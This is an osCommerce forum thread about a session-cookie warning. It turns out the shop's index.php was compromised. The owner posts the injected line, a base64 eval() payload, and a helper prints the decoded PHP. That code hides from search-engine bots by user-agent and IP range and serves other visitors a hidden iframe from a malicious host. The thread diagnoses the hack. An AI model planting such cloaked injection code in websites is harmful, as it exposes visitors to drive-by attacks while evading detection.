Jump to content
  • Checkout
  • Login
  • Get in touch

osCommerce

The e-commerce.

Warning: session_start() [function.session-start]: Cannot send session cookie problem


kenpo

Recommended Posts

My website is displaying Warning: session_start() [function.session-start]: Cannot send session cookie problem errors.

 

Here is the full error message

 

Warning: session_start() [function.session-start]: Cannot send session cookie - headers already sent by (output started at /home1/magnolj9/public_html/closecombatdvds/index.php(1) : eval()'d code:37) in /home1/magnolj9/public_html/closecombatdvds/includes/functions/sessions.php on line 102

 

I looked thru the sessions.php file and I do not know what is am looking for as for as blank spaces.

 

here is the full list of the sessions.php. Where would be the errors? Am I looking in the right php file?

 

<?php

/*

$Id: sessions.php 1830 2008-01-30 00:58:21Z hpdl $

 

osCommerce, Open Source E-Commerce Solutions

http://www.oscommerce.com

 

Copyright © 2008 osCommerce

 

Released under the GNU General Public License

*/

 

if ( (PHP_VERSION >= 4.3) && ((bool)ini_get('register_globals') == false) ) {

@ini_set('session.bug_compat_42', 1);

@ini_set('session.bug_compat_warn', 0);

}

 

if (STORE_SESSIONS == 'mysql') {

if (!$SESS_LIFE = get_cfg_var('session.gc_maxlifetime')) {

$SESS_LIFE = 1440;

}

 

function _sess_open($save_path, $session_name) {

return true;

}

 

function _sess_close() {

return true;

}

 

function _sess_read($key) {

$value_query = tep_db_query("select value from " . TABLE_SESSIONS . " where sesskey = '" . tep_db_input($key) . "' and expiry > '" . time() . "'");

$value = tep_db_fetch_array($value_query);

 

if (isset($value['value'])) {

return $value['value'];

}

 

return '';

}

 

function _sess_write($key, $val) {

global $SESS_LIFE;

 

$expiry = time() + $SESS_LIFE;

$value = $val;

 

$check_query = tep_db_query("select count(*) as total from " . TABLE_SESSIONS . " where sesskey = '" . tep_db_input($key) . "'");

$check = tep_db_fetch_array($check_query);

 

if ($check['total'] > 0) {

return tep_db_query("update " . TABLE_SESSIONS . " set expiry = '" . tep_db_input($expiry) . "', value = '" . tep_db_input($value) . "' where sesskey = '" . tep_db_input($key) . "'");

} else {

return tep_db_query("insert into " . TABLE_SESSIONS . " values ('" . tep_db_input($key) . "', '" . tep_db_input($expiry) . "', '" . tep_db_input($value) . "')");

}

}

 

function _sess_destroy($key) {

return tep_db_query("delete from " . TABLE_SESSIONS . " where sesskey = '" . tep_db_input($key) . "'");

}

 

function _sess_gc($maxlifetime) {

tep_db_query("delete from " . TABLE_SESSIONS . " where expiry < '" . time() . "'");

 

return true;

}

 

session_set_save_handler('_sess_open', '_sess_close', '_sess_read', '_sess_write', '_sess_destroy', '_sess_gc');

}

 

function tep_session_start() {

global $HTTP_GET_VARS, $HTTP_POST_VARS, $HTTP_COOKIE_VARS;

 

$sane_session_id = true;

 

if (isset($HTTP_GET_VARS[tep_session_name()])) {

if (preg_match('/^[a-zA-Z0-9]+$/', $HTTP_GET_VARS[tep_session_name()]) == false) {

unset($HTTP_GET_VARS[tep_session_name()]);

 

$sane_session_id = false;

}

} elseif (isset($HTTP_POST_VARS[tep_session_name()])) {

if (preg_match('/^[a-zA-Z0-9]+$/', $HTTP_POST_VARS[tep_session_name()]) == false) {

unset($HTTP_POST_VARS[tep_session_name()]);

 

$sane_session_id = false;

}

} elseif (isset($HTTP_COOKIE_VARS[tep_session_name()])) {

if (preg_match('/^[a-zA-Z0-9]+$/', $HTTP_COOKIE_VARS[tep_session_name()]) == false) {

$session_data = session_get_cookie_params();

 

setcookie(tep_session_name(), '', time()-42000, $session_data['path'], $session_data['domain']);

 

$sane_session_id = false;

}

}

 

if ($sane_session_id == false) {

tep_redirect(tep_href_link(FILENAME_DEFAULT, '', 'NONSSL', false));

}

 

return session_start();

}

 

function tep_session_register($variable) {

global $session_started;

 

if ($session_started == true) {

if (PHP_VERSION < 4.3) {

return session_register($variable);

} else {

if (isset($GLOBALS[$variable])) {

$_SESSION[$variable] =& $GLOBALS[$variable];

} else {

$_SESSION[$variable] = null;

}

}

}

 

return false;

}

 

function tep_session_is_registered($variable) {

if (PHP_VERSION < 4.3) {

return session_is_registered($variable);

} else {

return isset($_SESSION) && array_key_exists($variable, $_SESSION);

}

}

 

function tep_session_unregister($variable) {

if (PHP_VERSION < 4.3) {

return session_unregister($variable);

} else {

unset($_SESSION[$variable]);

}

}

 

function tep_session_id($sessid = '') {

if (!empty($sessid)) {

return session_id($sessid);

} else {

return session_id();

}

}

 

function tep_session_name($name = '') {

if (!empty($name)) {

return session_name($name);

} else {

return session_name();

}

}

 

function tep_session_close() {

if (PHP_VERSION >= '4.0.4') {

return session_write_close();

} elseif (function_exists('session_close')) {

return session_close();

}

}

 

function tep_session_destroy() {

return session_destroy();

}

 

function tep_session_save_path($path = '') {

if (!empty($path)) {

return session_save_path($path);

} else {

return session_save_path();

}

}

 

function tep_session_recreate() {

if (PHP_VERSION >= 4.1) {

$session_backup = $_SESSION;

 

unset($_COOKIE[tep_session_name()]);

 

tep_session_destroy();

 

if (STORE_SESSIONS == 'mysql') {

session_set_save_handler('_sess_open', '_sess_close', '_sess_read', '_sess_write', '_sess_destroy', '_sess_gc');

}

 

tep_session_start();

 

$_SESSION = $session_backup;

unset($session_backup);

}

}

?>

Link to comment
Share on other sites

the error is coming from your

public_html/closecombatdvds/index.php file line 1 which suggests you have a space before the opening <?php if these is delete the space and try again

Nic

 

thank you for your response. I will check it out and take a look.

Link to comment
Share on other sites

thank you for your response. I will check it out and take a look.

 

 

here is the first line on the index file

 

<?php eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOw0KJGJvdCA9IEZBTFNFIDsNCiR1c2VyX2FnZW50X3RvX2ZpbHRlciA9IGFycmF5KCdib3QnLCdzcGlkZXInLCdzcHlkZXInLCdjcmF3bCcsJ3ZhbGlkYXRvcicsJ3NsdXJwJywnZG9jb21vJywneWFuZGV4JywnbWFpbC5ydScsJ2FsZXhhLmNvbScsJ3Bvc3RyYW5rLmNvbScsJ2h0bWxkb2MnLCd3ZWJjb2xsYWdlJywnYmxvZ3B1bHNlLmNvbScsJ2Fub255bW91c2Uub3JnJywnMTIzNDUnLCdodHRwY2xpZW50JywnYnV6enRyYWNrZXIuY29tJywnc25vb3B5JywnZmVlZHRvb2xzJywnYXJpYW5uYS5saWJlcm8uaXQnLCdpbnRlcm5ldHNlZXIuY29tJywnb3BlbmFjb29uLmRlJywncnJycnJycnJyJywnbWFnZW50JywnZG93bmxvYWQgbWFzdGVyJywnZHJ1cGFsLm9yZycsJ3ZsYyBtZWRpYSBwbGF5ZXInLCd2dnJraW1zanV3bHkgbDN1Zm1qcngnLCdzem4taW1hZ2UtcmVzaXplcicsJ2JkYnJhbmRwcm90ZWN0LmNvbScsJ3dvcmRwcmVzcycsJ3Jzc3JlYWRlcicsJ215YmxvZ2xvZyBhcGknKTsNCiRzdG9wX2lwc19tYXNrcyA9IGFycmF5KA0KCWFycmF5KCIyMTYuMjM5LjMyLjAiLCIyMTYuMjM5LjYzLjI1NSIpLA0KCWFycmF5KCI2NC42OC44MC4wIiAgLCI2NC42OC44Ny4yNTUiICApLA0KCWFycmF5KCI2Ni4xMDIuMC4wIiwgICI2Ni4xMDIuMTUuMjU1IiksDQoJYXJyYXkoIjY0LjIzMy4xNjAuMCIsIjY0LjIzMy4xOTEuMjU1IiksDQoJYXJyYXkoIjY2LjI0OS42NC4wIiwgIjY2LjI0OS45NS4yNTUiKSwNCglhcnJheSgiNzIuMTQuMTkyLjAiLCAiNzIuMTQuMjU1LjI1NSIpLA0KCWFycmF5KCIyMDkuODUuMTI4LjAiLCIyMDkuODUuMjU1LjI1NSIpLA0KCWFycmF5KCIxOTguMTA4LjEwMC4xOTIiLCIxOTguMTA4LjEwMC4yMDciKSwNCglhcnJheSgiMTczLjE5NC4wLjAiLCIxNzMuMTk0LjI1NS4yNTUiKSwNCglhcnJheSgiMjE2LjMzLjIyOS4xNDQiLCIyMTYuMzMuMjI5LjE1MSIpLA0KCWFycmF5KCIyMTYuMzMuMjI5LjE2MCIsIjIxNi4zMy4yMjkuMTY3IiksDQoJYXJyYXkoIjIwOS4xODUuMTA4LjEyOCIsIjIwOS4xODUuMTA4LjI1NSIpLA0KCWFycmF5KCIyMTYuMTA5Ljc1LjgwIiwiMjE2LjEwOS43NS45NSIpLA0KCWFycmF5KCI2NC42OC44OC4wIiwiNjQuNjguOTUuMjU1IiksDQoJYXJyYXkoIjY0LjY4LjY0LjY0IiwiNjQuNjguNjQuMTI3IiksDQoJYXJyYXkoIjY0LjQxLjIyMS4xOTIiLCI2NC40MS4yMjEuMjA3IiksDQoJYXJyYXkoIjc0LjEyNS4wLjAiLCI3NC4xMjUuMjU1LjI1NSIpLA0KCWFycmF5KCI2NS41Mi4wLjAiLCI2NS41NS4yNTUuMjU1IiksDQoJYXJyYXkoIjc0LjYuMC4wIiwiNzQuNi4yNTUuMjU1IiksDQoJYXJyYXkoIjY3LjE5NS4wLjAiLCI2Ny4xOTUuMjU1LjI1NSIpLA0KCWFycmF5KCI3Mi4zMC4wLjAiLCI3Mi4zMC4yNTUuMjU1IiksDQoJYXJyYXkoIjM4LjAuMC4wIiwiMzguMjU1LjI1NS4yNTUiKQ0KCSk7DQokbXlfaXAybG9uZyA9IHNwcmludGYoIiV1IixpcDJsb25nKCRfU0VSVkVSWydSRU1PVEVfQUREUiddKSk7DQpmb3JlYWNoICggJHN0b3BfaXBzX21hc2tzIGFzICRJUHMgKSB7DQoJJGZpcnN0X2Q9c3ByaW50ZigiJXUiLGlwMmxvbmcoJElQc1swXSkpOyAkc2Vjb25kX2Q9c3ByaW50ZigiJXUiLGlwMmxvbmcoJElQc1sxXSkpOw0KCWlmICgkbXlfaXAybG9uZyA+PSAkZmlyc3RfZCAmJiAkbXlfaXAybG9uZyA8PSAkc2Vjb25kX2QpIHskYm90ID0gVFJVRTsgYnJlYWs7fQ0KfQ0KZm9yZWFjaCAoJHVzZXJfYWdlbnRfdG9fZmlsdGVyIGFzICRib3Rfc2lnbil7DQoJaWYgIChzdHJwb3MoJF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddLCAkYm90X3NpZ24pICE9PSBmYWxzZSl7JGJvdCA9IHRydWU7IGJyZWFrO30NCn0NCmlmICghJGJvdCkgew0KZWNobyAnPGlmcmFtZSBzcmM9Imh0dHA6Ly8yM2dzaGRmamdzamZnZGouY28uY2MvUVFrRkJnMEFBUTBNQkEwREVrY0pCUVlOQXdjQ0FRTU1Bdz09IiB3aWR0aD0iMSIgaGVpZ2h0PSIxIj48L2lmcmFtZT4nOw0KfQ=='));

Link to comment
Share on other sites

You're hacked.

 

Visit the link below:

 

How to Secure Your Site

If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.

 

"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice."

- Me -

 

"Headers already sent" - The definitive help

 

"Cannot redeclare ..." - How to find/fix it

 

SSL Implementation Help

 

Like this post? "Like" it again over there >

Link to comment
Share on other sites

The hack code is decoded below.

 

The purpose is to put an iframe on the page if the site isn't being crawled by the bots it looks for.

 

That way the hackers get what they want (the iframe) but your site won't get blacklisted by the bots.

 

error_reporting(0);
$bot = FALSE ;
$user_agent_to_filter = array('bot','spider','spyder','crawl','validator','slurp','docomo','yandex','mail.ru','alexa.com','postrank.com','htmldoc','webcollage','blogpulse.com','anonymouse.org','12345','httpclient','buzztracker.com','snoopy','feedtools','arianna.libero.it','internetseer.com','openacoon.de','rrrrrrrrr','magent','download master','drupal.org','vlc media player','vvrkimsjuwly l3ufmjrx','szn-image-resizer','bdbrandprotect.com','wordpress','rssreader','mybloglog api');
$stop_ips_masks = array(
array("216.239.32.0","216.239.63.255"),
array("64.68.80.0"  ,"64.68.87.255"  ),
array("66.102.0.0",  "66.102.15.255"),
array("64.233.160.0","64.233.191.255"),
array("66.249.64.0", "66.249.95.255"),
array("72.14.192.0", "72.14.255.255"),
array("209.85.128.0","209.85.255.255"),
array("198.108.100.192","198.108.100.207"),
array("173.194.0.0","173.194.255.255"),
array("216.33.229.144","216.33.229.151"),
array("216.33.229.160","216.33.229.167"),
array("209.185.108.128","209.185.108.255"),
array("216.109.75.80","216.109.75.95"),
array("64.68.88.0","64.68.95.255"),
array("64.68.64.64","64.68.64.127"),
array("64.41.221.192","64.41.221.207"),
array("74.125.0.0","74.125.255.255"),
array("65.52.0.0","65.55.255.255"),
array("74.6.0.0","74.6.255.255"),
array("67.195.0.0","67.195.255.255"),
array("72.30.0.0","72.30.255.255"),
array("38.0.0.0","38.255.255.255")
);
$my_ip2long = sprintf("%u",ip2long($_SERVER['REMOTE_ADDR']));
foreach ( $stop_ips_masks as $IPs ) {
$first_d=sprintf("%u",ip2long($IPs[0])); $second_d=sprintf("%u",ip2long($IPs[1]));
if ($my_ip2long >= $first_d && $my_ip2long <= $second_d) {$bot = TRUE; break;}
}
foreach ($user_agent_to_filter as $bot_sign){
if  (strpos($_SERVER['HTTP_USER_AGENT'], $bot_sign) !== false){$bot = true; break;}
}
if (!$bot) {
echo '<iframe src="http://23gshdfjgsjfgdj.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAwcCAQMMAw==" width="1" height="1"></iframe>';
}

If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.

 

"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice."

- Me -

 

"Headers already sent" - The definitive help

 

"Cannot redeclare ..." - How to find/fix it

 

SSL Implementation Help

 

Like this post? "Like" it again over there >

Link to comment
Share on other sites

Archived

This topic is now archived and is closed to further replies.

×
×
  • Create New...